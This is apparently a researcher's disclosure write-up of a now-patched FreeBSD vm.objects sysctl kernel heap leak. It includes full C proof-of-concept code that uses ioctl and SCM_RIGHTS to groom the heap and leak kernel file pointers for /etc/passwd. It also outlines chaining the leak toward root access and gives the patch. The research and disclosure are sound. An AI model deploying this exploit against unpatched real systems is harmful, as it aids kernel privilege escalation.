FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure
chrisIntroduction
FreeBSD 11.2 introduced a kernel heap information disclosure bug due
to missing memory sanitisation through the vm.objects
sysctl. Actually, the underlying bug was present since 10.3, but existed
as a stack information disclosure instead.
While kernel information disclosure bugs aren’t terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.
This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.
The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.
Vulnerability Overview
For the uninitiated, “sysctl”s are something of a second-class
syscall interface. They’re basically system-wide key/value pairs exposed
by the kernel for reading (and sometimes writing) through the
sysctl(2)
syscall.
The sysctl(2)
syscall allows userland to provide 3
high-level pieces of data:
- The key of the sysctl to query.
- An optional userland pointer and size to fetch the “old” value into.
- An optional userland pointer and size to provide a “new” value.
For a lot of sysctls, since they’re system-wide, providing a “new”
value requires root privileges. To read some value, userland will
typically just provide a pointer/size for the “old” value and leave the
“new” pointer/size as NULL
/0
.
While most sysctls expose simple primitive datatypes, such as strings
or integers, some sysctls are more complex and interesting. To serve the
more interesting cases, the FreeBSD kernel source provides the
SYSCTL_PROC
macro, which basically says “declare this
sysctl and use that function to handle the request”.
The functions that handle the requests sometimes get less attention than traditional syscalls, so they’re worth exploring for vulnerabilities.
Here’s the vm.objects
sysctl definition from the
vm/vm_object.c
file in the FreeBSD kernel:
static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
{
return (vm_object_list_handler(req, false));
}
[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
"List of VM objects");
We can see the SYSCTL_PROC
macro defining the
"objects"
node of the "vm"
root node [1] and
referencing the function sysctl_vm_object_list
[2] as the
handler function.
Notice that the SYSCTL_HANDLER_ARGS
macro expands to the
standard argument list of a sysctl implementation:
#define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1, \
intmax_t arg2, struct sysctl_req *req
Let’s see what actually happens in
vm_object_list_handler
, then:
static int
vm_object_list_handler(struct sysctl_req *req, bool swap_only)
{
struct kinfo_vmobject *kvo;
char *fullpath, *freepath;
struct vnode *vp;
struct vattr va;
vm_object_t obj;
vm_page_t m;
u_long sp;
int count, error;
[3] if (req->oldptr == NULL) {
/*
* If an old buffer has not been provided, generate an
* estimate of the space needed for a subsequent call.
*/
...
return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
count * 11 / 10));
}
[4] kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
error = 0;
/*
* VM objects are type stable and are never removed from the
* list once added. This allows us to safely read obj->object_list
* after reacquiring the VM object lock.
*/
mtx_lock(&vm_object_list_mtx);
[5] TAILQ_FOREACH(obj, &vm_object_list, object_list) {
...
if (obj->type == OBJT_DEAD ||
(swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
continue;
VM_OBJECT_RLOCK(obj);
if (obj->type == OBJT_DEAD ||
(swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
VM_OBJECT_RUNLOCK(obj);
continue;
}
mtx_unlock(&vm_object_list_mtx);
[6] kvo->kvo_size = ptoa(obj->size);
kvo->kvo_resident = obj->resident_page_count;
kvo->kvo_ref_count = obj->ref_count;
...
/* Pack record size down */
kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
+ strlen(kvo->kvo_path) + 1;
kvo->kvo_structsize = roundup(kvo->kvo_structsize,
sizeof(uint64_t));
[7] error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
maybe_yield();
mtx_lock(&vm_object_list_mtx);
if (error)
break;
}
mtx_unlock(&vm_object_list_mtx);
free(kvo, M_TEMP);
return (error);
}
The purpose of this sysctl is to provide a list of information about virtual memory objects to userland. This could be a pretty lengthy list depending on exactly how many objects are visible to the calling process.
If userland called the sysctl with a NULL
“old” pointer,
the kernel tries to provide some useful estimate of the size of buffer
they should allocate and call again with [3].
If an “old” pointer/size was provided, then the kernel tries to
provide as much of the information as possible. It begins by allocating
an object that it will populate for each object [4]. This is a
struct kinfo_vmobject
struct.
Next, it loops through all of the objects on the global
vm_object_list
[5] and populates that information object
with various pieces of information – some of which are shown in the
snippet starting at [6], but many are omitted here for brevity.
Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.
The short story of what’s happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.
The object the kernel uses to store this information in is a
kinfo_vmobject
and is particularly interesting because the
call to malloc
doesn’t pass the M_ZERO
flag.
That means that the memory will not be zero-initialised by the kernel
heap allocator.
If any fields aren’t explicitly set by the logic here, those uninitialised bytes will be copied out to userland.
Sure enough, it seems there are plenty of bytes that remain uninitialised:
/*
* The "vm.objects" sysctl provides a list of all VM objects in the system
* via an array of these entries.
*/
struct kinfo_vmobject {
int kvo_structsize; /* Variable size of record. */
int kvo_type; /* Object type: KVME_TYPE_*. */
uint64_t kvo_size; /* Object size in pages. */
uint64_t kvo_vn_fileid; /* inode number if vnode. */
uint32_t kvo_vn_fsid_freebsd11; /* dev_t of vnode location. */
int kvo_ref_count; /* Reference count. */
int kvo_shadow_count; /* Shadow count. */
int kvo_memattr; /* Memory attribute. */
uint64_t kvo_resident; /* Number of resident pages. */
uint64_t kvo_active; /* Number of active pages. */
uint64_t kvo_inactive; /* Number of inactive pages. */
union {
uint64_t _kvo_vn_fsid;
uint64_t _kvo_backing_obj; /* Handle for the backing obj */
} kvo_type_spec; /* Type-specific union */
uint64_t kvo_me; /* Uniq handle for anon obj */
uint64_t _kvo_qspare[6];
uint32_t kvo_swapped; /* Number of swapped pages */
uint32_t _kvo_ispare[7];
char kvo_path[PATH_MAX]; /* Pathname, if any. */
};
At first glance, it looks like we’ve struck info-disclosure gold with
the very large kvo_path
field at the end
(PATH_MAX
is 1024
), but if we refer back to
the copyout logic, we use the strlen
of that field as an
upper-bound.
Even so, there are a few “spare” fields that provide more than enough useful bytes to leak.
Exploitability Analysis
Uninitialised kernel heap disclosures aren’t useful in every case.
The case here is pretty promising, however, because the allocation comes
from the general purpose heap (i.e. through malloc
) and
there are clearly plenty of bytes for us to target with a groom in the
_kvo_qspare
and _kvo_ispare
fields.
So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.
Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.
The ioctl(2)
syscall is a good candidate for this:
int
sys_ioctl(struct thread *td, struct ioctl_args *uap)
{
u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
uint32_t com;
int arg, error;
u_int size;
caddr_t data;
...
[1] size = IOCPARM_LEN(com);
...
if (size > 0) {
if (com & IOC_VOID) {
...
} else {
if (size > SYS_IOCTL_SMALL_SIZE)
[2] data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
else
data = smalldata;
}
...
if (com & IOC_IN) {
[3] error = copyin(uap->data, data, (u_int)size);
...
error = kern_ioctl(td, uap->fd, com, data);
if (error == 0 && (com & IOC_OUT))
error = copyout(data, uap->data, (u_int)size);
out:
if (size > SYS_IOCTL_SMALL_SIZE)
[4] free(data, M_IOCTLOPS);
return (error);
}
The size of the data from userland is extracted from the ioctl
command itself using the IOCPARM_LEN
macro [1]. For small
sizes, the kernel uses a buffer on the stack – but over a certain limit,
it allocates the size using malloc
[2]. This limit is 128
bytes.
With a buffer allocated, it then does a copyin
[3],
calls down to kern_ioctl
and then frees on the exit path
[4].
Why is this useful? The FreeBSD kernel heap allocator works in a LIFO
fashion: malloc
will return back the last memory chunk
free
d (for the same size class). That means that if we try
to invoke a spurious ioctl (or an ioctl on a spurious file descriptor),
this becomes a simple malloc
, copyin
,
free
gadget that we can use to control the uninitialised
bytes of the next malloc
.
If the next malloc
is the one from the
vm.objects
sysctl then we should see those bytes coming
back to us.
Here’s a simple PoC to test:
#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>
static void
hexdump(const void *data, size_t datasz)
{
const unsigned char *b = data;
size_t n;
for (n = 0; n < datasz; ++n) {
fprintf(stderr, "%02x ", b[n]);
switch ((n + 1) & 0xf) {
case 0: fputs("\n", stderr); break;
case 8: fputs(" ", stderr); break;
}
}
fputs("\n", stderr);
}
static void
prep_leak(void)
{
unsigned char dummy[sizeof(struct kinfo_vmobject)];
memset(dummy, 'A', sizeof(dummy));
ioctl(-1, _IOW(0, 0, dummy), dummy);
}
int
main(int argc, char *argv[])
{
unsigned char buf[sizeof(struct kinfo_vmobject)];
size_t bufsz = sizeof(buf);
bzero(buf, sizeof(buf));
prep_leak();
sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);
hexdump(buf, bufsz);
return 0;
}
Trying it out, we can see our controlled data:
$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 05 00 00 00
You’ll notice a lot of repeated data here. That’s because we provided
a buffer big enough to fit a whole struct kinfo_vmobject
in, but due to the strlen
of the path limiting the
copyout
, each virtual memory object actually only occupies
a small amount of the buffer.
The repeating hacking number regions are the “spare” fields that we’re seeing for each object.
Finding a Leak Target
When in possession of a kernel heap information disclosure bug like
this, we need to do a little research to groom the heap in a way that
leaks some data we actually care about. Sadly, nobody cares about
leaking "AAAA..."
, so we’ll need to think some more.
The first thing we need to understand is which malloc
bucket this leak is coming from. The kernel heap allocator coarsely
organises its internal allocation buckets by size. To determine which
bucket this particular leak is coming from, we need to know the size of
the kinfo_vmobject
struct:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184
And check that against the malloc
bucket sizes defined
in kern/kern_malloc.c
:
struct {
int kz_size;
const char *kz_name;
uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
{16, "malloc-16", },
{32, "malloc-32", },
{64, "malloc-64", },
{128, "malloc-128", },
{256, "malloc-256", },
{384, "malloc-384", },
{512, "malloc-512", },
{1024, "malloc-1024", },
{2048, "malloc-2048", },
{4096, "malloc-4096", },
{8192, "malloc-8192", },
{16384, "malloc-16384", },
{32768, "malloc-32768", },
{65536, "malloc-65536", },
{0, NULL},
};
Since the size of the object is 1184 bytes, it’s too big to come from the 1024 bucket – it must be from the 2048 bucket.
Whatever we’re trying to leak, it has to come from the same bucket and has to contain something useful.
This is where a hunt for “elastic objects” is pretty handy. Rather
than just looking for single struct
s of the right size that
happen to be allocated using malloc
, we can look for calls
to malloc
that have some dynamic element to them.
One such useful elastic object is the allocation done when file
descriptors are sent over a UNIX domain socket with the
SCM_RIGHTS
auxiliary control message (“cmsg”).
Leaking File Structs with SCM_RIGHTS
The uipc_send
kernel function handles the guts of
sending data over a UNIX domain socket:
static int
uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
struct mbuf *control, struct thread *td)
{
...
if (control != NULL &&
[1] (error = unp_internalize(&control, td, NULL, NULL, NULL)))
goto release;
If an auxiliary control message was passed to the
sendmsg(2)
syscall, the kernel calls
unp_internalize
[1].
Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different “type”, length and associated data.
For UNIX domain sockets, there are a few different types of extra
data that a process can send in this way, but the one we’re interested
in here is SCM_RIGHTS
, which allows a process to send file
descriptors to the recipient. It’s an interesting and neat feature that
we can see unp_internalize
handle:
static int
unp_internalize(struct mbuf **controlp, struct thread *td,
struct mbuf **clast, u_int *space, u_int *mbcnt)
{
struct mbuf *control, **initial_controlp;
struct proc *p;
struct filedesc *fdesc;
struct bintime *bt;
struct cmsghdr *cm;
struct cmsgcred *cmcred;
struct filedescent *fde, **fdep, *fdev;
struct file *fp;
struct timeval *tv;
struct timespec *ts;
void *data;
socklen_t clen, datalen;
int i, j, error, *fdp, oldfds;
u_int newlen;
MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
UNP_LINK_UNLOCK_ASSERT();
p = td->td_proc;
fdesc = p->p_fd;
error = 0;
control = *controlp;
*controlp = NULL;
initial_controlp = controlp;
[2] for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
data = CMSG_DATA(cm);
clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
(char *)cm + cm->cmsg_len >= (char *)data;
clen -= min(CMSG_SPACE(datalen), clen),
cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
data = CMSG_DATA(cm)) {
...
datalen = (char *)cm + cm->cmsg_len - (char *)data;
switch (cm->cmsg_type) {
...
case SCM_RIGHTS:
[3] oldfds = datalen / sizeof (int);
if (oldfds == 0)
continue;
/* On some machines sizeof pointer is bigger than
* sizeof int, so we need to check if data fits into
* single mbuf. We could allocate several mbufs, and
* unp_externalize() should even properly handle that.
* But it is not worth to complicate the code for an
* insane scenario of passing over 200 file descriptors
* at once.
*/
newlen = oldfds * sizeof(fdep[0]);
if (CMSG_SPACE(newlen) > MCLBYTES) {
error = EMSGSIZE;
goto out;
}
/*
* Check that all the FDs passed in refer to legal
* files. If not, reject the entire operation.
*/
fdp = data;
FILEDESC_SLOCK(fdesc);
[4] for (i = 0; i < oldfds; i++, fdp++) {
fp = fget_noref(fdesc, *fdp);
if (fp == NULL) {
FILEDESC_SUNLOCK(fdesc);
error = EBADF;
goto out;
}
if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
FILEDESC_SUNLOCK(fdesc);
error = EOPNOTSUPP;
goto out;
}
}
/*
* Now replace the integer FDs with pointers to the
* file structure and capability rights.
*/
[5] *controlp = sbcreatecontrol(NULL, newlen,
SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
fdp = data;
[6] for (i = 0; i < oldfds; i++, fdp++) {
if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
fdp = data;
for (j = 0; j < i; j++, fdp++) {
fdrop(fdesc->fd_ofiles[*fdp].
fde_file, td);
}
FILEDESC_SUNLOCK(fdesc);
error = EBADF;
goto out;
}
}
fdp = data;
fdep = (struct filedescent **)
CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7] fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
M_WAITOK);
[8] for (i = 0; i < oldfds; i++, fdev++, fdp++) {
fde = &fdesc->fd_ofiles[*fdp];
fdep[i] = fdev;
[9] fdep[i]->fde_file = fde->fde_file;
filecaps_copy(&fde->fde_caps,
&fdep[i]->fde_caps, true);
unp_internalize_fp(fdep[i]->fde_file);
}
FILEDESC_SUNLOCK(fdesc);
break;
...
This code looks long and complex, but we needn’t fear it. At the top
level, the code loops over the list of cmsgs [2] and switches on the
type of each. For a control message of type SCM_RIGHTS
, the
kernel first determines how many file descriptors follow the cmsg header
[3].
Next, it loops over all of the file descriptors making sure that
they’re able to be sent [4] (some types of file are forbidden from being
sent like this) before allocating an mbuf to hold an array of
filedescent
pointers [5]. mbufs are a unit of heap
allocation specific to the networking stack in FreeBSD. They’re backed
by their own special zone and arbitrary lengths are constructed by
creating a linked list of mbufs. We can largely ignore them for the
discussion here.
A filedescent
is how an open file within a process’ file
descriptor table is represented. In fact, a numeric file descriptor is
literally just an index into a table of these structures:
struct filedescent {
struct file *fde_file; /* file structure for open file */
struct filecaps fde_caps; /* per-descriptor rights */
uint8_t fde_flags; /* per-process open file flags */
seqc_t fde_seqc; /* keep file and caps in sync */
};
Each entry points to the file
struct that’s open and has
some other associated fields (e.g. if UF_CLOEXEC
has been
set for that descriptor).
Remember that at this point the kernel’s only allocated an array of pointers to these.
With an array of filedescent
pointers allocated, the
next step is to walk over the list of file descriptors again and obtain
a reference to each [6]. If this fails for any, the whole process is
aborted.
Finally, the kernel has determined that the descriptors are sendable
and it was able to acquire a reference on each. The last step is to
allocate an array to hold the actual filedescent
structs
[7], then loop over the descriptors one last time [8], setting the
filedescent
pointers in the mbuf to an element in this new
malloc
d array [9].
Here’s a rough diagram of how this data will look:
┌────────────────────────────────────────────────────────────────────────────────┐
│mbuf_t │
├──────────────┬─────────────────────────────────────────────────────────────────┤
│ m_hdr │ m_data │
└──────────────┴─────────────────────────────────────────────────────────────────┘
│
┌──────────────┬──────────────┬──────┴───────┬──────────────┐
▼ ▼ ▼ ▼ ▼
┌──────────────┬──────────────┬──────────────┬──────────────┬──────────────┐
│ filedescent │ filedescent │ filedescent │ filedescent │ filedescent │
├──────────────┴──────────────┴──────────────┴──────────────┴──────────────┤
│malloc(nfd * sizeof(struct filedescent)) │
└──────────────────────────────────────────────────────────────────────────┘
When the UNIX message is received by the recipient process, this
process is reversed: the filedescent
s are pulled out of the
control message and inserted into the receiving process’ file descriptor
table. The array of filedescent
s that were allocated in
unp_internalize
is free
d once this is done.
See unp_externalize
if you’re interested.
The elastic object we’re interested in leaking is the array of
filedescent
structs at [7]. By leaking the contents of that
array, we can discover a kernel pointer to a live file
struct. That’s a useful pointer to have if we have an arbitrary write,
since we can do interesting things like granting write access to a file
we have open for reading (e.g. /etc/passwd
or
/etc/libmap.conf
– see man libmap.conf
to
spark your imagination).
We can control the size of the malloc
through the number
of file descriptors we send in our cmsg. Hitting our target is
simple:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24
We just need to send 24 file descriptors.
Proof of Concept
Our final exploitation strategy is:
- Create a connected pair of UNIX domain sockets with
socketpair(2)
. - Fork and have the child process block on a
recv(2)
. - Open the file that we wish to disclose the
file
pointer of. - Send a message to the child process with an
SCM_RIGHTS
cmsg containing 24 copies of that file descriptor. - Once the descriptors have been received by the child, leak memory
via the
vm.objects
sysctl.
Here’s a simple PoC:
/*
* FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
* 2022-Dec-08
*
* [email protected]
*/
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
static void
pin_to_cpu(size_t n)
{
cpuset_t cs;
CPU_ZERO(&cs);
CPU_SET(n, &cs);
if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
sizeof(cs), &cs))
err(1, "cpuset_setaffinity");
}
static void
child_proc(int sock)
{
unsigned char ack = 0;
/* receive the file descriptors */
if (-1 == recv(sock, &ack, sizeof(ack), 0))
err(1, "recv");
/* acknowledge receipt so we know the buffer is free */
if (-1 == send(sock, &ack, sizeof(ack), 0))
err(1, "send");
}
#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))
static const void *
leak_kptr(int fd)
{
struct kinfo_vmobject buf;
size_t bufsz = sizeof(buf);
pid_t child;
int s[2];
unsigned char ack = 0;
struct iovec iov = {
.iov_base = &ack,
.iov_len = sizeof(ack)
};
unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
struct cmsghdr *cmsgh;
struct msghdr msgh;
size_t n;
int *pfd;
if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
err(1, "socketpair");
switch ((child = fork())) {
case -1: err(1, "fork");
case 0:
/* child will receive the fds */
close(s[0]);
pin_to_cpu(0);
child_proc(s[1]);
exit(0);
}
/* this proc will send the fds */
close(s[1]);
pin_to_cpu(0);
/* set up the cmsg first */
bzero(cmsgbuf, sizeof(cmsgbuf));
cmsgh = (struct cmsghdr *)cmsgbuf;
cmsgh->cmsg_level = SOL_SOCKET;
cmsgh->cmsg_type = SCM_RIGHTS;
cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);
for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
*pfd++ = fd;
}
/* now the msghdr */
bzero(&msgh, sizeof(msgh));
msgh.msg_iov = &iov;
msgh.msg_iovlen = 1;
msgh.msg_control = cmsgh;
msgh.msg_controllen = cmsgh->cmsg_len;
/* send and await ack */
if (-1 == sendmsg(s[0], &msgh, 0))
err(1, "sendmsg");
if (-1 == recv(s[0], &ack, 1, 0))
err(1, "recv");
/* now we can leak the buffer */
bzero(&buf, sizeof(buf));
sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);
/* and reap the child */
waitpid(child, NULL, 0);
return *(const void **)(&buf._kvo_qspare[3]);
}
int
main(int argc, char *argv[])
{
int fd[2];
/* open some interesting files to leak: */
if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
err(1, "open");
if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
err(1, "open");
fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));
/* close and re-open to show LIFO behaviour: */
fputs("[+] close + reopen\n", stderr);
close(fd[1]);
if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
err(1, "open");
fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
return 0;
}
The output of running it:
$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410
Success. Now we can chain that arbitrary write vulnerability to grant
us write-access to /etc/passwd
, add an empty-password root
user and elevate.
What do you mean you don’t have an arbitrary write vulnerability…?
Fix
The fix for this bug is super simple: the malloc
in
vm_object_list_handler
just needs to include the
M_ZERO
flag. This ensures that the memory is
zero-initialised and nothing useful will leak back to userland:
--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
count * 11 / 10));
}
- kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+ kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
error = 0;
/*
Conclusion
FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it’s quite error-prone.
We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object, if they originate from a dedicated zone, it’s generally not possible to control the leak in such an easy way that we did here.
Even so, these bugs can be fun to play with and don’t require a huge amount of effort to make into useful parts of a chain. It’s worth finding them.
For context on the effort put into this research, I took around an hour to walk through a bunch of sysctls before finding this and writing a PoC maybe took 30 minutes altogether.